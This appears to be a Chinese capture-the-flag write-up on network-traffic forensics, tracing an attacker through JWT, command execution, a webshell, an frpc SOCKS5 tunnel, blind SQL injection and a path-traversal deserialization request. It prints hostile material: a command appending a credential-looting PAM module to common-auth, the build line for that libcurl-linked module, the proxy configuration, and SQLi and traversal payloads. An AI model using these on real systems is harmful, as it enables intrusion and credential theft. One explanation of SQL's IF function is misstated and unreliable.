JWT
使用wireshark打开附件,追踪HTTP流。
分析这个JWT字段,到jwt.io下面去解出来
追踪TCP流,到第10个TCP时,我们可以发现这里实现了命令执行,输出了当前服务器的权限。
获得命令执行接口后,上传了一个c文件到tmp目录下。
上传该c文件后,使用makefile操作将这个c文件编译成恶意的so文件。
CFLAGS += -Werror -Wall
looter.so: looter.c
gcc $(CFLAGS) -fPIC -shared -Xlinker -x -o $@ $< -lcurl
- 1
- 2
- 3
- 4
在第26个数据报中可以看到修改文件内容的命令
command=echo "auth optional looter.so">>/etc/pam.d/common-aut
- 1
webshell
找到用于web应用登录的用户名和密码
查看cookie可以看到这是thinkphp的框架,这里也显示了这个web服务器的日志文件目录。
Cookie: PHPSESSID=c7rg88itbq4egddujcpt67mqh6; think_language=zh-CN; think_template=default
- 1
由于是一句话木马获取webshell,所以权限是www-data
查看攻击者使用的代理工具
将上面的字符串L3Zhci93d3cvaHRtbC9mcnBj进行base64解码,得知代理工具为frpc
同时,将后面的十六进制数值进行解码,得到以下信息。
[common]
server_addr = 192.168.239.123
server_port = 7778
token=Xa3BJf2l5enmN6Z7A8mv
[test_sock5]
type = tcp
remote_port =8111
plugin = socks5
plugin_user = 0HDFt16cLQJ
plugin_passwd = JTN276Gp
use_encryption = true
use_compression = true
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
sql注入
日志文件中使用了sql盲注进行数据的爆破
1 and if(substr(database(),1,1) = 'w',1,(select table_name from information_schema.tables))
- 1
if函数,如果第一个表达式的值为真,那么返回第二个表达式的值。如果为假,那么返回第二个表达式的值。
同时,我们知道,sql盲注在获得第一个字符后,就会终止爆破,去查找第二个字符。
以此类推,可以获得这里的数据库名以及其他信息。
日志分析
源码泄露
反序列化
GET /?filename=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Ftmp%2Fsess_car&content=func%7CN%3Bfiles%7Ca%3A2%3A%7Bs%3A8%3A%22filename%22%3Bs%3A16%3A%22.%2Ffiles%2Ffilename%22%3Bs%3A20%3A%22call_user_func_array%22%3Bs%3A28%3A%22.%2Ffiles%2Fcall_user_func_array%22%3B%7Dpaths%7Ca%3A1%3A%7Bs%3A5%3A%22%2Fflag%22%3Bs%3A13%3A%22SplFileObject%22%3B%7D
ser_func_array%22%3B%7Dpaths%7Ca%3A1%3A%7Bs%3A5%3A%22%2Fflag%22%3Bs%3A13%3A%22SplFileObject%22%3B%7D
- 1
- 2
题目描述: 单位网站被黑客挂马,请您从流量中分析出webshell,进行回答: 解题思路: 3.1黑客登录系统使用的密码是__Admin123!@#。 3.2黑客修改了一个日志文件,文件的绝对路径为_/var/www/html/data/Runtime/Log…
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论